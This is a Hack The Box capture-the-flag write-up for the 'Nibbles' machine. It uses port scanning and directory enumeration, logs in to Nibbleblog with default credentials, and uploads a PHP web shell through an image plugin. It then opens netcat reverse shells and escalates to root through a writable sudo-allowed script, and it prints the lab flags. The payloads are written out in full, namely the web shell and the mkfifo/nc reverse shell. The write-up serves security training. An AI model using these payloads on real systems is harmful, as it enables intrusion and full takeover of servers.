#linux #hackthebox #easy ![[Pasted image 20250611221947.png]] # Nmap - Enumeration Initial port scanning result (all ports 1~65,535) ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS 10.10.10.75 -Pn -n --open -p- -oN tcpall [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:53 CDT Nmap scan report for 10.10.10.75 Host is up (0.051s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds ``` A more detailed scan is performed on the discovered ports, 22 and 80 ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV 10.10.10.75 -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:54 CDT Nmap scan report for 10.10.10.75 Host is up (0.052s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds ``` # Footprinting Navigated to the webpage `10.10.10.75` and its page source revealed the presence of the `/nibbleblog` directory ![[Pasted image 20250611205820.png]] I ran `Gobuster` to enumerate directories and files on `10.10.10.75/nibbleblog`. It revealed several interesting directories and files. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.75/nibbleblog [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 301] /index.php (Status: 200) [Size: 2987] /sitemap.php (Status: 200) [Size: 402] /content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/] /themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] /feed.php (Status: 200) [Size: 302] /admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/] /admin.php (Status: 200) [Size: 1401] /plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/] /install.php (Status: 200) [Size: 78] /update.php (Status: 200) [Size: 1622] /README (Status: 200) [Size: 4628] /languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/] /LICENSE.txt (Status: 200) [Size: 35148] ``` `/admin.php` presented a login page where `admin:nibbles` worked as valid credentials. ![[Pasted image 20250611211703.png]] This is how the nibbleblog dashboard looks after logged in as admin ![[Pasted image 20250611212022.png]] In the `Settings` tab, scroll all the way to the bottom to find the Nibbleblog version, which is **4.0.3** ![[Pasted image 20250611212148.png]] In the `Plugins` tab, I found a feature that allows file uploads. I believe this can be leveraged to gain an initial foothold. ![[Pasted image 20250611212614.png]] First, I uploaded an image file to test where the images are saved. Then I clicked the `View Blog` button and noticed that the `MY IMAGE` section had been updated. ![[Pasted image 20250611213847.png]] ![[Pasted image 20250611213922.png]] You can right-click on the uploaded image and select 'Open image in new tab' which will open up a new browser tab with the following URL: `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.jpg`. As shown in the URL, the server renamed the uploaded file to `image.jpg`. The original filename was `cat.jpg`. Based on the previous test results, I created a file containing a simple PHP one-liner `<?php system($_GET['cmd']); ?>` and uploaded it as `cmd.php`. Then I navigated to `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/cmd.php?cmd=id` but it returned **Not Found**. After changing the filename in the URL to `image.php`, the command executed successfully. ![[Pasted image 20250611214933.png]] Now it's time to get our reverse shell. I have updated my `cmd.php` to make it connect back to us. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat cmd.php <?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f"); ?> ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... ``` Got the shell! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 39358 /bin/sh: 0: can't access tty; job control turned off $ whoami nibbler ``` Found `user.txt` ```bash nibbler@Nibbles:/home/nibbler$ cat user.txt cb8c... ``` # PrivEsc `sudo -l` command revealed that the user `nibbler` can run the following commands as `root`. ```bash nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh ``` We can modify `stuff` to contain another reverse shell that connects back to me and grants a shell as `root` ```bash nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1235 >/tmp/f ``` Run the following command to fire up the reverse shell `sudo /home/nibbler/personal/stuff/monitor.sh` Connected as `root` and found `root.txt` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1235 listening on [any] 1235 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 40764 # whoami root # cd /root # ls root.txt # cat root.txt 21643b4fbcc4d4e1854077397e4d9ee0 ```